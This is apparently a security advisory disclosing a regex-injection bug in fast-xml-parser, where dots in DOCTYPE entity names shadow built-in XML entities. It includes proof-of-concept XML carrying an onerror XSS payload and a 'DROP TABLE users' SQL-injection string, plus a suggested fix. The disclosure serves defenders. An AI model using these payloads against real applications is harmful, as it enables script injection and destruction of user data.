- "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (`<`, `>`, `&`, `"`, `'`) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n regx: RegExp(`&${entityName};`, \"g\"),\n val: val\n};\n```\n\nAn entity named `l.` produces the regex `/&l.;/g` where `.` matches **any character**, including the `t` in `<`. Since DOCTYPE entities are replaced before built-in entities, this shadows `<` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`), and in the v6 codebase - `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^&*()<>|+\"; // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/&l.;/g` | `<` |\n| `g.` | `/&g.;/g` | `>` |\n| `am.` | `/&am.;/g` | `&` |\n| `quo.` | `/&quo.;/g` | `"` |\n| `apo.` | `/&apo.;/g` | `'` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n <!ENTITY l. \"<img src=x onerror=alert(1)>\">\n]>\n<root>\n <text>Hello <b>World</b></text>\n</root>`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>\n```\n\nNo special parser options needed - `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page (e.g. `innerHTML`, template interpolation, SSR), the injected `<img onerror>` fires.\n\n`&` can be shadowed too:\n\n```js\nconst xml2 = `<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n <!ENTITY am. \"'; DROP TABLE users;--\">\n]>\n<root>SELECT * FROM t WHERE name='O&Brien'</root>`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `<` / `>` / `&` / `"` / `'` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, '\\\\$&');\nentities[entityName] = {\n regx: RegExp(`&${escaped};`, \"g\"),\n val: val\n};\n```\n\nFor v6, add `.` to the blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[].{}^&*()<>|+\";\n```\n\n## Severity\n\nEntity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.",
0 commit comments